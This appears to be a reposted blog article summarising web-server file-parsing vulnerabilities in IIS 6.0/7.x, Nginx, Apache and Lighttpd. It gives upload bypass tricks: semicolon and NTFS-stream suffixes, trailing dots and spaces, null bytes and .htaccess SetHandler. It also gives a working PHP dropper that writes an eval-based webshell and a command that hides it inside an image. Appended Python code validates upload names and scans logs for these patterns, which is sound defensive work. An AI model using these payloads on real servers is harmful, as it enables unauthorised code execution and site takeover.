Summary of server parsing vulnerabilities such as IIS 6.0/7.0/7.5, Nginx, Apache, etc.

Source: Internet
Author: User

[+] IIS 6.0

Directory parsing: /xx.asp/xx.jpg. Here xx.jpg can be any text file (e.g. xx.txt) whose content is the backdoor code.

IIS 6.0 parses xx.jpg as an ASP file because it sits in a directory whose name ends in .asp.

Suffix parsing: /xx.asp;.jpg and /xx.asp:.jpg (the file name has to be changed by intercepting the upload request).

IIS 6.0 parses files with these suffixes as ASP files.

(Webmaster comment: for an analysis of the cause of the IIS 6.0 vulnerability, see the short article by Rogo: IIS file name parsing vulnerability analysis)

{A file named /xx.asp:.jpg is not allowed to exist under Windows: the :.jpg part is automatically removed, leaving /xx.asp}

(Webmaster comment: an error was found here; it is not that such a file is not allowed to exist. This path is called an "NTFS data stream"; see the comments under "IIS6 colon upload vulnerability" and "Discovered IIS6 vulnerability (upload exploitation)")

Default parsing: /xx.asa, /xx.cer, /xx.cdx

Besides .asp, the files IIS 6.0 executes by default include these three types.

(Webmaster comment: this is mainly because, in the default IIS configuration, these suffixes are mapped to asp.dll and so have the same execute permission as .asp; you can delete these suffix mappings in the configuration to remove the risk)

These can be combined with the directory parsing vulnerability: /xx.asa/xx.jpg or /xx.cer/xx.jpg, or with suffix parsing as xx.asa;.jpg.


[+] IIS 7.0 / IIS 7.5 / Nginx <= 0.8.37

With FastCGI enabled (the default), appending /xx.php to the path of a file (/xx.jpg) makes the server parse /xx.jpg/xx.php as a PHP file.

Common usage: write the backdoor code into a text file and append it to the binary data of a picture, so that the image header and trailer are not destroyed.

e.g. copy xx.jpg /b + yy.txt /a xy.jpg

######################################

/b is binary mode; /a is ASCII mode. xx.jpg is a normal picture file.

yy.txt content: <?php fputs(fopen('shell.php', 'w'), '<?php eval($_POST[cmd])?>'); ?>

This writes a file named shell.php whose content is <?php eval($_POST[cmd])?>

######################################

Find a place to upload xy.jpg, then find the URL of xy.jpg and append /xx.php to it to execute the embedded code.

A one-line webshell shell.php with password cmd is then created in the picture directory.


[+] Nginx <= 0.8.37

Even with FastCGI turned off, Nginx <= 0.8.37 still has a parsing vulnerability.

Appending %00.php to a file path (/xx.jpg) makes Nginx parse /xx.jpg%00.php as a PHP file.

(Webmaster comment: this evolved from /test.jpg/x.php; for details see: Nginx null byte remote code execution vulnerability)


[+] Apache

Suffix parsing: test.php.x1.x2.x3

Apache evaluates suffixes from right to left: if x3 is not a recognizable suffix it moves on to x2, and so on until it finds a recognizable suffix, which it then uses for parsing.

test.php.x1.x2.x3 is therefore parsed as PHP.

Experience: php|php3|phtml can all be parsed by Apache.

(Webmaster comment: for the Apache parsing vulnerability, see "Apache vulnerabilities: suffix name parsing vulnerability")


[+] Some other usable tricks

In a Windows environment, files named xx.jpg[space] or xx.jpg. are not allowed to exist; if a file is given such a name, Windows strips the trailing space or dot by default, which can be exploited!

When uploading to a Windows host, intercept the request and modify the file name by adding a trailing space or dot to try to bypass a blacklist; if the upload succeeds, the trailing dot or space is removed, and the shell is obtained.

I remember FCK PHP 2.6 had a space bypass vulnerability. {Linux hosts do not work: Linux allows such files to exist}

If the site runs Apache and .htaccess is honoured (AllowOverride for the directory is set to All in the Apache configuration file httpd.conf, so Apache applies the .htaccess in that directory; comment by Sfasfas), and you can upload one, you can try writing into .htaccess:

<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>

Replace shell.jpg with the file you uploaded, and shell.jpg will be parsed as a PHP file.
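As an added defensive example (not code from the original article), the following Python check applies the rules described in the IIS 6.0, Apache and Windows sections above to an uploaded file name before it is stored: names containing ';' or ':' are rejected, trailing dots and spaces are stripped first (Windows drops them), a script extension anywhere in a multi-extension name is rejected (Apache's right-to-left rule), and .htaccess is refused. The allowlist of image extensions is an assumption.

```python
# Added defensive example, not code from the original article.
# Assumed policy: only the image extensions below may be uploaded.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Extensions the page lists as executable: IIS 6.0 (asp, asa, cer, cdx)
# and Apache (php, php3, phtml).
SCRIPT_EXTENSIONS = {"asp", "asa", "cer", "cdx", "php", "php3", "phtml"}
# Files that change server behaviour if they land in a web directory.
CONFIG_NAMES = {".htaccess"}


def normalize_windows_name(name: str) -> str:
    """Return the name Windows/NTFS would actually store.

    NTFS silently drops trailing dots and spaces, and ':' introduces an
    NTFS data stream, so 'xx.asp:.jpg' is stored as 'xx.asp'.
    """
    name = name.split(":", 1)[0]
    return name.rstrip(". ")


def is_safe_upload_name(submitted: str) -> bool:
    """Check an uploaded file name against the parsing rules on this page."""
    name = normalize_windows_name(submitted)
    # A path separator would recreate the /xx.asp/xx.jpg directory trick.
    if not name or "/" in name or "\\" in name:
        return False
    if name.lower() in CONFIG_NAMES:
        return False
    # IIS 6.0 stops reading the name at ';' ('xx.asp;.jpg' runs as ASP);
    # a raw NUL reproduces the Nginx %00 truncation.
    if ";" in name or "\x00" in name:
        return False
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    # Apache walks extensions right to left ('test.php.x1.x2.x3' is PHP),
    # so a script extension anywhere after the base name is rejected.
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:]):
        return False
    return parts[-1] in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for candidate in ["photo.jpg", "xx.asp;.jpg", "xx.asp:.jpg",
                      "shell.php ", "test.php.x1.x2.x3", ".htaccess"]:
        print(f"{candidate!r:24} -> {is_safe_upload_name(candidate)}")
```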


[+] Lighttpd

xx.jpg/xx.php (the same path parsing pattern as above)
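As an added detection example (not code from the original article), the following Python scan over constructed access-log lines flags the two request shapes this page describes: a static file followed by a fake script path component (/xx.jpg/xx.php, the IIS 7.x FastCGI, Nginx <= 0.8.37 and Lighttpd pattern) and a null byte before the script extension (/xx.jpg%00.php, Nginx <= 0.8.37). The Common Log Format layout and the sample lines are assumptions.

```python
# Added detection example, not code from the original article.
# Log format (Common Log Format) and the sample lines are constructed.
import re
from urllib.parse import unquote

STATIC_EXT = r"(?:jpe?g|png|gif|bmp|txt)"
SCRIPT_EXT = r"(?:php\d?|phtml|asp|asa|cer|cdx)"

# /xx.jpg/xx.php : IIS 7.x FastCGI, Nginx <= 0.8.37, Lighttpd path parsing.
PATHINFO_RE = re.compile(rf"\.{STATIC_EXT}/[^/?\s]*\.{SCRIPT_EXT}\b", re.I)
# /xx.jpg%00.php : Nginx <= 0.8.37 null-byte truncation, matched after decoding.
NULLBYTE_RE = re.compile(rf"\.{STATIC_EXT}\x00[^/?\s]*\.{SCRIPT_EXT}\b", re.I)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3})"
)


def classify_request(path: str):
    """Label a request path, or return None when it matches neither pattern."""
    decoded = unquote(path)  # %00 -> NUL, %2F -> '/', etc.
    if NULLBYTE_RE.search(decoded):
        return "nullbyte-parse"
    if PATHINFO_RE.search(decoded):
        return "pathinfo-parse"
    return None


def scan_log(lines):
    """Return (ip, path, status, label) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m["path"])
        if label:
            hits.append((m["ip"], m["path"], m["status"], label))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /uploads/xy.jpg HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /uploads/xy.jpg/xx.php HTTP/1.1" 200 12
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /uploads/xy.jpg%00.php HTTP/1.1" 200 12
198.51.100.2 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 3301
""".splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the case worth alerting on, since a server that is not vulnerable normally answers such paths with 404.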


[Added by El4pse]


This article is from the blog "My World, I am the director"; please keep this source: http://biock.blog.51cto.com/4643304/1643911
